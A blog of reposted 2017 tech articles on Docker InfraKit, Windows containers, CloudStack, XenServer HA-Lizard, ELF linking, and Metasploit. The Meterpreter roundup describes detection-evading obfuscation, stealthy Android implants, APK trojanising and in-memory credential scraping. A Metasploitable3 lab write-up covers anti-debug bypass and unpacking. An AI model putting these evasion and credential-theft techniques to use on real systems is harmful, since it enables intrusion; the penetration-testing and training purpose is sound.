Wednesday, January 18, 2017

InfraKit Under the Hood: High Availability [feedly]

InfraKit Under the Hood: High Availability
http://dockr.ly/2j4Vxvd

-- via my feedly newsfeed

Back in October, Docker released Infrakit, an open source toolkit for creating and managing declarative, self-healing infrastructure. This is the first in a two part series that dives more deeply into the internals of InfraKit.

Introduction

At Docker,  our mission to build tools of mass innovation constantly challenges to look at ways to improve the way developers and operators work. Docker Engine with integrated orchestration via Swarm mode have greatly simplified and improved efficiency in application deployment and management of microservices. Going a level deeper, we asked ourselves if we could improve the lives of operators by making tools to simplify and automate orchestration of infrastructure resources. This led us to open source InfraKit, as set of building blocks for creating self-healing and self-managing systems.

There are articles and tutorials (such as this, and this) to help you get acquainted with InfraKit. InfraKit is made up of a set of components which actively manage infrastructure resources based on a declarative specification. These active agents continuously monitor and reconcile differences between your specification and actual infrastructure state. So far, we have implemented the functionality of scaling groups to support the creation of a compute cluster or application cluster that can self-heal and dynamically scale in size. To make this functionality available for different infrastructure platforms (e.g. AWS or bare-metal) and extensible for different applications (e.g. Zookeeper or Docker orchestration), we support customization and adaptation through the instance and flavor plugins. The group controller exposes operations for scaling in and out and for rolling update and communicates with the plugins using JSON-RPC 2.0 over HTTP. While the project provides packages implemented in Go for building platform-specific plugins (like this one for AWS), it is possible to use other language and tooling to create interesting and compatible plugins.

High Availability

Because InfraKit is used to ensure the availability and scaling of a cluster, it needs to be highly available and perform its duties without interruption.  To support this requirement, we consider the following:

  1. Redundancy & Failover — for active management without interruption.
  2. Infrastructure State — for an accurate view of the cluster and its resources.
  3. User specification — keeping it available even in case of failure.

Redundancy & Failover

Running multiple sets of the InfraKit daemons on separate physical nodes is an obvious approach to achieving redundancy.  However, while multiple replicas are running, only one of the replica sets can be active at a time. Having at most one leader (or master) at any time ensures no multiple controllers are independently making decisions and thus end up conflicting with one another while attempting to correct infrastructure state. However, with only one active instance at any given time, the role of the active leader must transition smoothly and quickly to another replica in the event of failure. When a node running as the leader crashes, another set of InfraKit daemons will assume leadership and attempt to correct the infrastructure state. This corrective measure will then restore the lost instance in the cluster, bringing the cluster back to the desired state before outage.

There are many options in implementing this leadership election mechanism. Popular coordinators for this include Zookeeper and Etcd which are consensus-based systems in which multiple nodes form a quorum. Similar to these is the Docker engine (1.12+) running in Swarm Mode, which is based on SwarmKit, a native clustering technology based on the same Raft consensus algorithm as Etcd. In keeping with the goal of creating a toolkit for building systems, we made these design choices:

  1. InfraKit only needs to observe leadership in a cluster: when the node becomes the leader, the InfraKit daemons on that node become active. When leadership is lost, the daemons on the old leader are deactivated, while control is transferred over to the InfraKit daemons running on the new leader.
  2. Create a simple API for sending leadership information to InfraKit. This makes it possible to connect InfraKit to a variety of inputs from Docker Engines in Swarm Mode (post 1.12) to polling a file in a shared file system (e.g. AWS EFS).
  3. InfraKit does not itself implement leader election. This allows InfraKit to be readily integrated into systems that already have its own manager quorum and leader election such as Docker Swarm. Of course, it's possible to add leader election using a coordinator such as Etcd and feed that to InfraKit via the leadership observation API.

With this design, coupled with a coordinator, we can run InfraKit daemons in replicas on multiple nodes in a cluster while ensuring only one leader is active at any given time. When leadership changes, InfraKit daemons running on the new leader must be able to assess infrastructure state and determine the delta from user specification.

Infrastructure State

Rather than relying on an internal, central datastore to manage the state of the infrastructure, such as an inventory of all vm instances, InfraKit aggregates and computes the infrastructure state based on what it can observe from querying the infrastructure provider. This means that:

  1. The instance plugin needs to transform the query from the group controller to appropriate calls to the provider's API.
  2. The infrastructure provider should support labeling or tagging of provisioned resources such as vm instances.
  3. In cases where the provider does not support labeling and querying resources by labels, the instance plugin has the responsibility to maintain that state. Approaches for this vary with plugin implementation but they often involve using services such as S3 for persistence.

Not having to store and manage infrastructure state greatly simplified the system. Since the infrastructure state is always aggregated and computed on-demand, it is always up to date. However, other factors such as availability and performance of the platform API itself can impact observability. For example, high latencies and even API throttling must be handled carefully in determining the cluster state and consequently deriving a plan to push toward convergence with the user's specifications.

User Specification

InfraKit daemons continuously observe the infrastructure state and compares that with the user's specification. The user's specification for the cluster is expressed in JSON format and is used to determine the necessary steps to drive towards convergence. InfraKit requires this information to be highly available so that in the event of failover, the user specification can be accessed by the new leader.

There are options for implementing replication of the user specification. These range from using file systems backed by persistent object stores such as S3 to EFS to using distributed key-value store such as Zookeeper or Etcd. Like other parts of the toolkit, we opted to define an interface with different implementations of this configuration store. In the repo, there are stores implemented using file system and Docker Swarm. More implementations are possible and we welcome contributions!

Conclusion

In this article, we have examined some of the considerations in designing InfraKit. As a systems meant to be incorporated as a toolkit into larger systems, we aimed for modularity and composability. To achieve these goals, the project specifies interfaces which define interactions of different subsystems. As a rule, we try to provide different implementations to test and demonstrate these ideas. One such implementation of high availability with InfraKit leverages Docker Engine in Swarm Mode — the native clustering and orchestration technology of the Docker Platform — to give the swarm self-healing properties. In the next installment, we will investigate this in greater detail.

Check out the InfraKit repository README for more info, a quick tutorial and to start experimenting — from plain files to Terraform integration to building a Zookeeper ensemble. Have a look, explore, and send us a PR or open an issue with your ideas!

More Resources:

#InfraKit Under the Hood: High Availability #docker
Click To Tweet

 

The post InfraKit Under the Hood: High Availability appeared first on Docker Blog.

Docker for Windows Server and Image2Docker [feedly]

Docker for Windows Server and Image2Docker
http://dockr.ly/2iLw4Iq

-- via my feedly newsfeed

In December we had a live webinar focused on Windows Server Docker containers. We covered a lot of ground and we had some great feedback – thanks to all the folks who joined us. This is a brief recap of the session, which also gives answers to the questions we didn't get round to.

Webinar Recording

You can view the webinar on YouTube:

The recording clocks in at just under an hour. Here's what we covered:

  • 00:00 Introduction
  • 02:00 Docker on Windows Server 2016
  • 05:30 Windows Server 2016 technical details
  • 10:30 Hyper-V and Windows Server Containers
  • 13:00 Docker for Windows Demo – ASP.NET Core app with SQL Server
  • 25:30 Additional Partnerships between Docker, Inc. and Microsoft
  • 27:30 Introduction to Image2Docker
  • 30:00 Demo – Extracting ASP.NET Apps from a VM using Image2Docker
  • 52:00 Next steps and resources for learning Docker on Windows

Q&A

Can these [Windows] containers be hosted on a Linux host?

No. Docker containers use the underlying operating system kernel to run processes, so you can't mix and match kernels. You can only run Windows Docker images on Windows, and Linux Docker images on Linux.

However, with an upcoming release to the Windows network stack, you will be able to run a hybrid Docker Swarm – a single cluster containing a mixture of Linux and Windows hosts. Then you can run distributed apps with Linux containers and Windows containers communicating in the same Docker Swarm, using Docker's networking layer.

Is this only for ASP.NET Core apps?

No. You can package pretty much any Windows application into a Docker image, provided it can be installed and run without a UI.

The first demo in the Webinar showed an ASP.NET Core app running in Docker. The advantage with .NET Core is that it's cross-platform so the same app can run in Linux or Windows containers, and on Windows you can use the lightweight Nano Server option.

In the second demo we showed ASP.NET WebForms and ASP.NET MVC apps running in Docker. Full .NET Framework apps need to use the WIndows Server Core base image, but that gives you access to the whole feature set of Windows Server 2016.

If you have existing ASP.NET applications running in VMs, you can use the Image2Docker tool to port them across to Docker images. Image2Docker works on any Windows Server VM, from Server 2003 to Server 2016.

How does licensing work?

For production, licensing is at the host level, i.e. each machine or VM which is running Docker. Your Windows licence on the host allows you to run any number of Windows Docker containers on that host. With Windows Server 2016 you get the commercially supported version of Docker included in the licence costs, with support from Microsoft and Docker, Inc.

For development, Docker for Windows runs on Windows 10 and is free, open-source software. Docker for Windows can also run a Linux VM on your machine, so you can use both Linux and Windows containers in development. Like the server version, your Windows 10 licence allows you to run any number of Windows Docker containers.

Windows admins will want a unified platform for managing images and containers. That's Docker Datacenter which is separately licensed, and will be available for Windows soon.

What about Windows updates for the containers?

Docker containers have a different life cycle from full VMs or bare-metal servers. You wouldn't deploy an app update or a Windows update inside a running container – instead you update the image that packages your app, then just kill the container and start a new container from the updated image.

Microsoft are supporting that workflow with the two Windows base images on Docker Hub – for Windows Server Core and Nano Server. They are following a monthly release cycle, and each release adds an incremental update with new patches and security updates.

For your own applications, you would aim to have the same deployment schedule – after a new release of the Windows base image, you would rebuild your application images and deploy new containers. All this can be automated, so it's much faster and more reliable than manual patching. Docker Captain Stefan Scherer has a great blog post on keeping your Windows containers up to date.

Additional Resources

Our #Windows containers webinar is on @YouTube for you to #LearnDocker
Click To Tweet

The post Docker for Windows Server and Image2Docker appeared first on Docker Blog.

Tuesday, January 17, 2017

Apache CloudStack 4.9.2 LTS (Long Term Support) [feedly]

Apache CloudStack 4.9.2 LTS (Long Term Support)
http://www.shapeblue.com/apache-cloudstack-4-9-2-lts-long-term-support/

-- via my feedly newsfeed

ShapeBlue are delighted to confirm that the latest version of CloudStack is now on our support matrix as a fully supported and recommended version for our customers. We have worked extensively with the CloudStack community on quality control and testing, and this release contains more than 80 bug-fixes and improvements on the CloudStack 4.9 release. We have also introduced better QA automation, testing and code reviewing.

As well as these improvements, some major new functionality has been introduced, including support for XenServer 7, VMWare vSphere 6.0 and 6.5. Already in the 4.9 release is Out-Of-Band power management for hosts and several improvements to networking and storage. The 4.9.2 release notes include a full list of corrected issues, as well as upgrade instructions from previous versions of Apache CloudStack, and can be found here.

Long Term Support

LTS branches of CloudStack are maintained by the CloudStack community for 18 months:

  • 1-12 months: backport blocker and critical priority defect fixes in the scope (ie. not in a new feature) of the LTS branch functionality; fix all blocker and critical priority defects identified on the LTS branch
  • 13-18 months: backport blocker and CVE (security) fixes in the scope of the LTS branch functionality; fix all blocker and critical priority defects identified on the LTS branch

For our CloudStack Infrastructure Support customers, an LTS release on the ShapeBlue support matrix will be fully supported for an additional 6 months (so a total of 2 years) including our Product Patching service.

ShapeBlue CloudStack Infrastructure Support for the 4.9 LTS branch will be provided until 1 January 2019.

Downloads

All documentation, including release notes and installation guides, as well as the packages available for download can be found on our website here.

The official installation, administration and API documentation for each release are available on the CloudStack documentation page.

More information

For more information on this latest release, or if you would like to discuss our services, please contact us at info@shapeblue.com

Xenserver High-Availability Alternative Ha-Lizard [feedly]

Xenserver High-Availability Alternative Ha-Lizard
http://xenserver.org/blog/entry/xenserver-high-availability-alternative-ha-lizard-1.html

-- via my feedly newsfeed

WHY HA AND WHAT IT DOES

XenServer (XS) contains a native high-availability (HA) option which allows quite a bit of flexibility in determining the state of a pool of hosts and under what circumstances Virtual Machines (VMs) are to be restarted on alternative hosts in the event of the loss of the ability of a host to be able to serve VMs. HA is a very useful feature that protects VMs from staying failed in the event of a server crash or other incident that makes VMs inaccessible. Allowing a XS pool to help itself maintain the functionality of VMs is an important feature and one that plays a large role in sustaining as much uptime as possible. Permitting the servers to automatically deal with fail-overs makes system administration easier and allows for more rapid reaction times to incidents, leading to increased up-time for servers and the applications they run.

XS allows for the designation of three different treatments of Virtual Machines: (1) always restart, (2) restart if possible, and (3) do not restart. The VMs designated with the highest restart priority will be the first to be attempted to restart and all will be handled, provided adequate resources (primarily, host memory) are available.  A specific start order, allowing for some VMs to be checked to be running before others, can also be established. VMs will be automatically distributed among whatever remaining XS hosts are considered active. Where necessary, note that hosts that contain expandable memory will be shrunk down to accommodate additional hosts and those hosts designated to be restarted will also be run with reduced memory, if necessary. If additional capacity exists to run more VMs, those designated as "start if possible" will be brought online. Whichever VMs that are not considered essential typically will be marked as "do not restart" and hence will be left "off" had they been running before, requiring any of those desired to be restarted to be done manually, resources permitting.

XS also allows for specifying the minimum number of active hosts to remain to accommodate failures; larger pools that are not overly populated with VMs can readily accommodate even two or more host failures.

The election of what hosts are "live" and should be considered active members of the pool follows a rather involved process of a combination of network accessibility plus access to an independent designated pooled Storage Repository (SR) that serves as an additional metric. The pooled SR can also be a fiber channel device, being independent of Ethernet connections. A quorum-based algorithm is applied to establish which servers are up and active as members of the pool and which -- in the event of a pool master failure -- should be elected the new pool master.

 

WHEN HA WORKS, IT WORKS GREAT

Without going into more detail, suffice it to say that this methodology works very well, however requiring a few prerequisite conditions that need to be taken into consideration. First of all, the mandate that a pooled storage device be available clearly means that a pool consisting of hosts that only make use of local storage will be precluded. Second, there is also a constraint that for a quorum to be possible, it is required to have a minimum of three hosts in the pool or HA results will be unpredictable as the election of a pool master can become ambiguous. This comes about because of the so-called "split brain" issue (http://linux-ha.org/wiki/Split_Brain) which is endemic in many different operating system environments that employ a quorum as means of making such a decision. Furthermore, while fencing (the process of isolating the host; see for example http://linux-ha.org/wiki/Fencing) is the typical recourse, the lack of intercommunication can result in a wrong decision being made and hence loss of access to VMs. Having experimented with two-host pools and the native XenServer HA, I would say that an estimate of it working about half the time is about right and from a statistical viewpoint, pretty much what you would expect.

This limitation is, however, still of immediate concern to those with either no pooled storage and/or only two hosts in a pool. With a little bit of extra network connectivity, a relatively simple and inexpensive solution to the external SR can be provided by making a very small NFS-based SR available. The second condition, however, is not readily rectified without the expense of at least one additional host and all the connectivity associated with it. In some cases, this may simply not be an affordable option.

 

ENTER HA-LIZARD

For a number of years now, an alternative method of providing HA has been available through the program package provided by HA-Lizard (http://www.halizard.com/) , a community project that provides a free alternative that is neither dependent on external SRs nor requires a minimum of three hosts within a pool. In this blog, the focus will be on the standard HA-Lizard version and because of the particularly harder-to-handle situation of a two-node pool, it will also be the subject of discussion.

I had been experimenting for some time with HA-Lizard and found in particular that I was able to create failure scenarios that needed some improvement. HA-Lizard's Salvatore Costantino was more than willing to lend an ear to the cases I had found and this led further to a very productive collaboration on investigating and implementing means to deal with a number of specific cases involving two-host pools. The result of these several months of efforts is a new HA-Lizard release that manages to address a number of additional scenarios above and beyond its earlier capabilities.

It is worthwhile mentioning that there are two ways of deploying HA-Lizard:

1) Most use cases combine HA-Lizard and iSCSI-HA which creates a two-node pool using local storage while maintaining full VM agility with VMs being able to run on either host. In this case, DRBD (http://www.drbd.org/) is implemented in this type of deployment and it works very well making use of the real-time storage replication.

2) HA-Lizard, only, is used with an external Storage Repository (as in this particular case).

Before going into details of the investigation, a few words should go towards a brief explanation of how this works. Note that there is only Internet connectivity (the use of a heuristic network node) and no external SR, so how is a split brain situation then avoidable?

This is how I'd describe the course of action in this two-node situation:

If a node sees the gateway, assume it's alive. If it cannot, assume it's a good candidate for fencing. If the node that cannot see the gateway is the master, it should internally kill any running VMs and surrender its ability to be the master and fence itself. The slave node should promote itself to master and attempt to restart any missing VMs. Any that are on the previous master will probably fail though, because there is no communication to the old master. If the old VMs cannot be restarted, eventually the new master will be able to restart them regardless after a toolstack restart. If the slave node fails by not being able to communicate with the network, as long as the master still sees the network and not the slave's network, it can assume the slave needs to fence itself, kill off its VMs and assume that they will be restarted on the current master. The slave needs to realize it cannot communicate out, and therefore should kill off any of its VMs and fence itself.

Naturally, the trickier part comes with the timing of the various actions, since each node has to blindly assume the other is going to conduct a sequence of events. The key here is that these are all agreed on ahead of time and as long as each follows its own specific instructions, it should not matter that each of the two nodes cannot see the other node. In essence, the lack of communication in this case allows for creating a very specific course of action! If both nodes fail, obviously the case is hopeless, but that would be true of any HA configuration in which no node is left standing.

Various test plans were worked out for various cases and the table below elucidates the different test scenarios, what was expected and what was actually observed. It is very encouraging that the vast majority of these cases can now be properly handled.

 

Particularly tricky here was the case of rebooting the master server from the shell, without first disabling HA-Lizard (something one could readily forget to do). Since the fail-over process takes a while, a large number of VMs cannot be handled before the communication breakdown takes place, hence one is left with a bit of a mess to clean up in the end. Nevertheless, it's still good to know what happens if something takes place that rightfully shouldn't!

The other cases, whether intentional or not, are handled predictably and reliably, which is of course the intent. Typically, a two-node pool isn't going to have a lot of complex VM dependencies, so the lack of a start order of VMs should not be perceived as a big shortcoming. Support for this feature may even be added in a future release.

 

CONCLUSIONS

HA-Lizard is a viable alternative to the native Citrix HA configuration. It's straightforward to set up and can handle standard failover cases with a selective "restart/do not restart" setting for each VM or can be globally configured. There are a quite a number of configuration parameters which the reader is encouraged to research in the extensive HA-Lizard documentation. There is also an on-line forum which serves as a source for information and prompt assistance with issues. This most recent release 2.1.3 is supported on both XenServer 6.5 and 7.0.

Above all, HA-Lizard shines when it comes to handling a non-pooled storage environment and in particular, all configurations of the dreaded two-node pool configuration. From my direct experience, HA-Lizard now handles the vast majority of issues involved in a two-node pool and can do so more reliably than the non-supported two-node pool using Citrix' own HA application. It has been possible to conduct a lot of tests with various cases and importantly, and to do so multiple times to ensure the actions are predictable and repeatable.

I would encourage taking a look at HA-Lizard and giving it a good test run. The software is free (contributions are accepted) and it is in extensive use and has a proven track record.  For a two-host pool, I can frankly not think of a better alternative, especially with these latest improvements and enhancements.

I would also like to thank Salvatore Costantino for the opportunity to participate in this investigation and am very pleased to see the fruits of this collaboration. It has been one way of contributing to the Citrix XenServer user community that many can immediately benefit from.

 

12 Days of HaXmas: Meterpreter's new Shiny for 2016 [feedly]

12 Days of HaXmas: Meterpreter's new Shiny for 2016
https://community.rapid7.com/community/metasploit/blog/2017/01/05/12-days-of-haxmas-meterpreters-new-shiny-for-2016

-- via my feedly newsfeed

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the "gifts" we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

 

Editor's Note: Yes, this is technically an extra post to celebrate the 12th day of HaXmas. We said we liked gifts!

 

Happy new year! It is once again time to reflect on Metasploit's new payload gifts of 2016 and to make some new resolutions. We had a lot of activity with Metasploit's payload development team, thanks to OJ Reeves, Spencer McIntyre, Tim Wright, Adam Cammack, danilbaz, and all of the other contributors. Here are some of the improvements that made their way into Meterpreter this year.

 

On the first day of Haxmas, OJ gave us an Obfuscated Protocol

 

Beginning the new year with a bang (and an ABI break), we added simple obfuscation to the underlying protocol that Meterpreter uses when communicating with Metasploit framework. While it is just a simple XOR encoding scheme, it still stumped a number of detection tools, and still does today. In the game of detection cat-and-mouse, security vendors often like to pick on the open source project first, since there is practically no reverse engineering required. It is doubly surprising that this very simple technique continues to work today. Just be sure to hide that stager

 

On the second day of Haxmas, Tim gave us two Android Services

 

Exploiting mobile devices is exciting, but a mobile session does not have the same level of always-on connectivity as an always-on server session does. It is easy to lose a your session because a phone went to sleep, there was a loss of network connectivity, or the payload was swapped for some other process. While we can't do much about networking, we did take care of the process swapping by adding the ability for Android meterpreter to automatically launch as a background service. This means that not only does it start automatically, it does not show up as a running task, and is able to run in a much more resilient and stealthy way.

On the third day of Haxmas, OJ gave us three Reverse Port Forwards

 

While exploits have been able to pivot server connections into a remote network through a session, Metasploit did not have the ability for a user to run a local tool and perform the same function. Now you can! Whether it's python responder or just a web server, you can now setup a locally-visible service via a Meterpreter session that visible to your target users. This is a nice complement to standard port forwarding that has been available with Meterpreter sessions for some time.

 

On the fourth day of Haxmas, Tim gave us four Festive Wallpapers

Sometimes, when on an engagement, you just want to know 'who did I own?'.  Looking around, it is not always obvious, and popping up calc.exe isn't always visible from afar, especially with those new-fangled HiDPI displays. Now Metasploit lets you change the background image on OS X, Windows and Android desktops. You can now update everyone's desktop with a festive picture of your your choosing.

 

On the fifth day of Haxmas, OJ gave us five Powershell Prompts

Powershell has been Microsoft's gift both to Administrators and Penetration Test/Red Teams. While it adds a powerful amount of capabilities, it is difficult to run powershell as a standalone process using powershell.exe within a Meterpreter session for a number of reasons: it sets up its own console handling, and can even be disabled or removed from a system.

 

This is where the Powershell Extension for Meterpreter comes in. It not only makes it possible to confortably run powershell commands from Meterpreter directly, you can also interface directly with Meterpreter straight from powershell. It uses the capaibilites built in to all modern Windows system libraries, so it even works if powershell.exe is missing from the system. Best of all, it never drops a file to disk. If you haven't checked it out already, make it your resolution to try out the Meterpreter powershell extension in 2017.

 

On the sixth day of Haxmas, Tim gave us six SQLite Queries

Mobile exploitation is fun for obtaining realtime data such as GPS coordinates, local WiFi access points, or even looking through the camera. But, getting data from applications can be trickier. Many Android applications use SQLite for data storage however, and armed with the combination of a local privilege escalation (of which there are now several for Android), you can now peruse local application data directly from within an Android session.

 

On the seventh day of Haxmas, danilbaz gave us seven Process Images

This one is for the security researchers and developers. Originally part of the Rekall forensic suite, winpmem allows you to automatically dump the memory image for a remote process directly back to your Metasploit console for local analysis. A bit more sophisticated than the memdump command that has shipped with Metasploit since the beginning of time, it works with many versions of Windows, does not require any files to be uploaded, and automatically takes care of any driver loading and setup. Hopefully we will also have OS X and Linux versions ready this coming year as well.

 

On the eight day of Haxmas, Tim gave us eight Androids in Packages

The Android Meterpreter payload continues to get more full-featured and easy to use. Stageless support now means that Android Meterpreter can now run as a fully self-contained APK, and without the need for staging, you can now save scarce bandwidth in mobile environments. APK injection means you can now add Meterpreter as a payload on existing Android applications, even resigning them with the signature of the original publisher. It even auto-obfuscates itself with Proguard build support.

 

On the ninth day of Haxmas, zeroSteiner gave us nine Resilient Serpents

Python Meterpreter saw a lot of love this year. In addition to a number of general bugfixes, it is now much more resilient on OS X and Windows platforms. On Windows, it can now automatically identify the Windows version, whether from Cygwin or as a native application. From OS X, reliability is greatly improved by avoiding using some of the more fragile OS X python extensions that can cause the Python interpreter to crash.

 

On the tenth day of Haxmas, OJ gave us ten Universal Handlers

Have you ever been confused about what sort of listener you should use on an engagement? Not sure if you'll be using 64-bit or 32-bit Linux when you target your hosts? Fret no more, the new universal HTTP payload, aka multi/meterpreter/reverse_http(s), now allows you to just set it and forget it.

 

On the eleventh day of Haxmas, Adam and Brent gave us eleven Posix Payloads

Two years ago, I started working at Rapid7 as a payloads specialist, and wrote this post (https://community.rapid7.com/community/metasploit/blog/2015/01/05/maxing-meterpr eters-mettle) outlining my goals for the year. Shortly after, I got distracted with a million other amazing Metasploit projects, but still kept the code on the back burner. This year, Adam, myself, and many others worked on the first release of Mettle, a new Posix Meterpreter with an emphasis on portability and performance. Got a SOHO router? Mettle fits. Got an IBM Mainframe? Mettle works there too! OSX, FreeBSD, OpenBSD? Well it works as well. Look forward to many more improvements in the Posix and embedded post-exploitation space, powered by the new Mettle payload.

 

On the twelfth day of Haxmas, OJ gave us twelve Scraped Credentials

Have you heard? Meterpreter now has the latest version of mimikatz integrated as part of the kiwi extension, which allows all sorts of credential-scraping goodness, supporting Windows XP through Server 2016. As a bonus, it still runs completely in memory for stealty operation. It is now easier than ever to keep Meterpreter up-to-date with upstream thanks to some nice new hooking capabilities in Mimikatz itself. Much thanks to gentilkiwi and OJ for the Christmas present.

 

Hope your 2017 is bright and look forward to many more gifts this coming year from the Metasploit payloads team!

Breaking Metasploitable3: The King of Clubs [feedly]

Breaking Metasploitable3: The King of Clubs
https://community.rapid7.com/community/metasploit/blog/2017/01/09/breaking-metasploitable3-the-king-of-clubs

-- via my feedly newsfeed

Metasploitable3 is a free virtual machine that we have recently created to allow people to simulate attacks using Metasploit. In it, we have planted multiple flags throughout the whole system; they are basically collectable poker card images of some of the Rapid7/Metasploit developers. Some are straight-forward and easy to open, some are hidden, or obfuscated, etc. Today, we would like to share the secret to unlocking one of these cards: the King of Clubs.

 

The King of Clubs is one of the fun flags to extract. This card can be found in the C:\Windows\System32 directory, and it's an executable. To retrieve it, you will need to compromise the host first. In this demonstration, we will SSH into the host. And when calling the King of Clubs executable, we are greeted with the following riddle:

 

 

Binary Analysis

 

Obviously, this executable requires a closer examination. So ideally, you want to download this binary somewhere to your favorite development/reversing environment:

 

 

If you attempt to look at the executable with a debugger, you will notice that the binary is packed, which makes it difficult to read. There are multiple ways to figure out what packer is used for the executable. Either you will most likely discover it by inspecting the PE structure, which contains multiple UPX sections. Or you can use PEiD to tell you:

 

 

UPX is a binary compression tool that is commonly used by malware to make reverse engineering a little bit more difficult. It is so common you can find an unpacker pretty easily, as well. In this example, we are using PE Explorer because it's free. PE Explore will automatically recognize our binary is packed with UPX, and unpack it. So all you have to do is open the binary with it and click save:

 

 

There, that wasn't too painful. Was it?

 

At this point, we are ready to read the binary with a disassembler. Let's start with the main function:

 

 

As we can see, the first thing the program does is checking if there is a debugger attached or not. If there it, then the program exits:

 

 

If you are doing dynamic analysis, don't forget to disable this :-)

 

The next thing it does is checking if the current user is "hdmoore" or not. If yes, then it writes a card to disk. If not, it prints out the riddle that we saw previously:

 

 

Let's look at how the card is created a little more. First off, we see that the constructor of the Card class initializes something with the value 0x0f, this piece of information is important for later:

 

 

After the initialization, our main function calls the writeCard function.

 

The writeCard function does two things. First, it iterates through a big chunk of data of 76473h bytes, XORing each byte. If you pay attention to where EAX comes from, which is [EBP+ARG_0], you should remember that it's the value the Card class initialized. So this means, the writeCard function is XORing a big chunk of data with 0x0F:

 

 

After the function is done XORing, it's ready to write the data to disk using ofstream. The first argument of ofstream's open function reveals that we are trying to write a file named "king_of_clubs.png":

 

 

After the file is written, we are at the end of the function, and that leads us to the end of the program.

 

Ways to Extraction

 

Now that we understand how the program works, we have some options to extract the XOR'd image from the binary

 
  • Since IDA already tells us where the XOR'd PNG data is at, we can extract 76474h bytes, and then XOR back the data with 0x0f.
  • Bypass the IsDebuggerPresent call with OllyDBG, and modify the JNZ jump for strcmp, which will force the program to always produce the card.
  • This is probably the easier one: Create a user named "hdmoore", run the program again:
 

 

And that's how you reverse engineer the challenge. Now, go ahead and give this a try, and see who the King of Clubs is. If you like this challenge, don't feel shy to try the other 14 Metasploitable3 flags as well :-)

 

If you haven't tried Metasploitable3 but finally want to get your hands dirty, you can get it here. Keep in mind that Metasploitable3 is a vulnerable image that's heavily exploitable by Metasploit, so if you don't have Metasploit, you should download that and put it in your tool box :-)

Habitat application portability and understanding dynamic linking of ELF binaries [feedly]

Habitat application portability and understanding dynamic linking of ELF binaries
https://blog.chef.io/2017/01/12/habitat-application-portability-and-understanding-dynamic-linking-of-elf-binaries/

-- via my feedly newsfeed

This post was originally published on the Hurry Up and Wait! blog on December 30, 2017.

I do not come from a classical computer science background and have spent the vast majority of my career working with Java, C# and Ruby – mostly on Windows. So I have managed to evade the details of exactly how native binaries find their dependencies at compile time and runtime on Linux. It just has not been a concern in the work that I do. If my app complains about missing low level dependencies, I find a binary distribution for Windows (99% of the time these exist and work across all modern Windows platforms) and install the MSI. Hopefully when the app is deployed, those same binary dependencies have been deployed on the production nodes and it would be just super if its the same version.

Recently I joined the Habitat team at Chef and one of the first things I did to get the feel of using Habitat to build software was to start creating Habitat build plans. The first plan I set out to create was .NET Core. I would soon find out that building .NET Core from source on Linux was probably a bad choice for a first plan. It uses clang instead of GCC, it has lots of cmake files that expect binaries to live in /usr/lib and it downloads built executables that do not link to Habitat packaged dependencies. Right out the gate, I got all sorts of various build errors as I plodded forward. Most of these errors centered around a common theme: "I can't find X." There were all sorts of issues beyond linking too that I won't get into here but I'm convinced that if I knew the basics of what this post will attempt to explain, I would have had a MUCH easier time with all the errors and pitfalls I faced.

What is linking and what are ELF binaries?

First lets define our terms:

ELF

There are no "Lord of the Rings" references to be had here. ELF is the Extensible and linkable format and defines how binary files are structured on Linux/Unix. This can include executable files, shared libraries, object files and more. An ELF file contains a set of headers and a number of sections for things like text, data, etc. One of the key roles of an ELF binary is to inform the operating system how to load a program into memory including all of the symbols it must link to.

Linking

Linking is a key part of the process of building an executable. The other key part is compiling. Often we refer to both jointly as "compiling" but they are really two distinct operations. First the compiler takes source code files and turn them into machine language instructions in the form of object files. These object files alone are not very useful to running a program.

Linking takes the object files (some might be from source code you wrote) and links them together with external library files to create a functioning program. If your source code calls a function from an external library, the compiler gleefully assumes that function exists and moves on. If it doesn't exist, don't worry, the linker will let you know.

Often when we hear about linking, two types are mentioned: static and dynamic. Static linking takes the external machine instructions and embeds them directly into the built executable. If all external dependencies of a program were statically linked, there would be only one executable file and no need for any dependent shared object files to be referenced.

However, we usually dynamically link our external dependencies. Dynamic linking does not embed the external code into the final executable. Instead it just points to an external shared object (.so) file (or .dll file on Windows) and loads that code into the running process at runtime. This has the benefit of being able to update external dependencies without having to ship and package your application each time a dependency is updated. Dynamic linking also results in a smaller application binary since it does not contain the external code.

On Unix/Linux systems, the ELF format specifies the metadata that governs what libraries will be linked. These libraries can be in many places on the machine and may exist in more than one place. The metadata in the ELF binary will help determine exactly what files are linked when that binary is executed.

Habitat + dynamic linking = portability

Habitat leverages dynamic linking to provide true application portability. It might not be immediately obvious what this means or why it is important or if it is even a good thing. So lets start by describing how applications typically load their dependencies in a normal environment and the role that configuration management systems like Chef play in these environments.

How you manage dependencies today

Lets say you have written an application that depends on the ZeroMQ library. You might use apt-get or yum to install ZeroMQ and its binaries are likely dropped somewhere into /usr. Now you can build and run your application and it will consume the ZeroMQ libraries installed. Unless it is told otherwise, the linker will scan the trusted Linux library locations for shared object files to link.

To illustrate this, I have built ZeroMQ from source and it produced libzmq.so.5 and put it in /usr/local/lib. If I examine that shared object with ldd, I can see where it links to its dependencies:

mwrock@ultrawrock:~$ ldd /usr/local/lib/libzmq.so.5  linux-vdso.so.1 =>  (0x00007ffffe05f000)  libunwind.so.8 => /usr/lib/x86_64-linux-gnu/libunwind.so.8 (0x00007f7e92370000)  libsodium.so.18 => /usr/local/lib/libsodium.so.18 (0x00007f7e92100000)  librt.so.1 => /lib/x86_64-linux-gnu/librt.so.1 (0x00007f7e91ef0000)  libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f7e91cd0000)  libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f7e91ac0000)  libstdc++.so.6 => /usr/lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f7e917a0000)  libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f7e91490000)  libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7e910c0000)  /lib64/ld-linux-x86-64.so.2 (0x00007f7e92a00000)  liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f7e90e80000)  libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f7e90c60000)

They are all linked to the dependencies found in the Linux trusted library locations.

Now the time comes to move to production and just like you needed to install the ZeroMQ libraries in your dev environment, you will need to do the same on your production nodes. We all know this drill and we have probably all been burned at some point – something new is deployed to production and either its dependencies were not there or they were but they were the wrong version.

Configuration Management as solution

